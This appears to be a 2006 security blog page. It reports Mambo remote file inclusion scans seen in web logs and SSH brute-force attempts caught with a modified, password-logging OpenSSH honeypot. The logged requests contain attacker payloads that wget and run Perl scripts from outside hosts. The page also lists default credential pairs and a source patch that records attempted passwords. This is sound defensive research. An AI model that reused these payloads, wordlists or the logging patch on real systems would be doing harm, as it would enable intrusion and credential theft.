I don’t need to say much more. The NIST guide to computer security log management is available here. On the bad side, even though they mention swatch, log parser and even the ancient logsentry, they forgot about ossec.
Category: General Security
bookmark_borderHigh volume of web (mambo) scans.
Since Thursday night I’m seeing a high volume of scans
on different web servers for possibly the following vulns:
http://secunia.com/advisories/14337/http://www.osvdb.org/displayvuln.php?osvdb_id=10180
However, they say the problem is on function.php and I’m seeing them on index.php. Can anyone confirm that?
Some log samples below..
200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
These are just a few from 15:00 nd 17:00 pm yesterday.
Interesting is that they don’t do anything else, just
try to execute it and leave (without searching for
other paths)… Btw, I’m seeing these alerts from
ossec.
bookmark_borderInteresting information about SSH scans
I spent last week doing some research on the recently very active SSH scans and sent out the following e-mail to the incidents mailling list. Just some clarification before the e-mail itself:
1- My modified version of SSHD is very simple and I won’t plublish a diff. I basically just downloaded the last version from openssh.org and added these two lines on auth-passwd.c (on line 80 of the file — just after the beginning of the auth_password function):
if(strlen(password) > 1))
error(“user: %s, pass: %s”, authctxt->user, password);
2- Regarding the location of the scans, they look very
disperse (my boxes are in the US). I got two from Brazil,
one from the UK, one from NL, one from Japan, two from
India(from the same ISP), 2 from the USA and 1 from
Canada…
I set up some honeypots and also made a few modifications to the ssh daemon to print out the passwords these scans were trying to use. I noticed a reduction in the number of scans, but I still got a few in the last few days. Basically I noticed 2 different scans. ** Scan 1 - Attempt many passwords against the root account and a lot of attempts against common/default accounts (with the password being the same as the account name). Interesting is that some of the passwords for root doesn't look very simple and some use keyboard combinations (probably common too). Received scans of this type from 7 different IPS (same passwords, users, etc). ** Scan 2 - Attempt a lot of strange passwords against the root and admin account. Look bellow to see why I think they are strange. Looks like the scanner is broken :) Received scans of this type from 3 different IPS. *** User, password combinations: ** Scan 1 (user, password combinations): user root, pass: 1qaz2wsx user root, pass: 1q2w3e4r5t6y user root, pass: 1qaz2wsx3edc4rfv user root, pass: qazwsxedcrfv user root, pass: webmaster user root, pass: michael user root, pass: work user root, pass: maggie user root, pass: print user root, pass: 123456 user root, pass: root1234 user root, pass: 1qaz2wsx3edc user root, pass: qazwsxedc user root, pass: qazwsx user root, pass: internet user root, pass: mobile user root, pass: windows user root, pass: superman user root, pass: 1q2w3e4r user root, pass: network user root, pass: system user root, pass: administrator user root, pass: 123qwe user root, pass: manager user root, pass: redhat user root, pass: fedora user root, pass: okmnji user root, pass: qwerty user root, pass: httpd user root, pass: linux user root, pass: coder user root, pass: www user root, pass: 123123 user root, pass: 1234567890 user james, pass: james user cvs, pass: cvs user tony, pass: tony user bill, pass: bill user print, pass: print user maggie, pass: maggie user info, pass: info user http, pass: http user ftp, pass: ftp user dany, pass: dany user suse, pass: suse user oracle, pass: oracle user tomcat, pass: tomcat user backup, pass: backup user id, pass: id user sgi, pass: sgi user postgres, pass: postgres user flowers, pass: flowers user internet, pass: internet user linux, pass: linux user nokia, pass: nokia user bash, pass: bash user mysql, pass: mysql user webmaster, pass: webmaster ** Scan 2 (user, password combinations): These passwors look very strange... Does anyone will ever use a password of root1234567890? :) user root, pass: root12 user root, pass: root123 user root, pass: root1234 user root, pass: root12345 user root, pass: root123456 user root, pass: root1234567 user root, pass: root12345678 user root, pass: root123456789 user root, pass: root1234567890 user admin, pass: admin user admin, pass: admin1 user admin, pass: admin12 user admin, pass: admin123 user admin, pass: admin1234 user admin, pass: admin12345 user admin, pass: admin123456 user admin, pass: admin1234567 user admin, pass: admin12345678 user admin, pass: admin123456789 user admin, pass: admin1234567890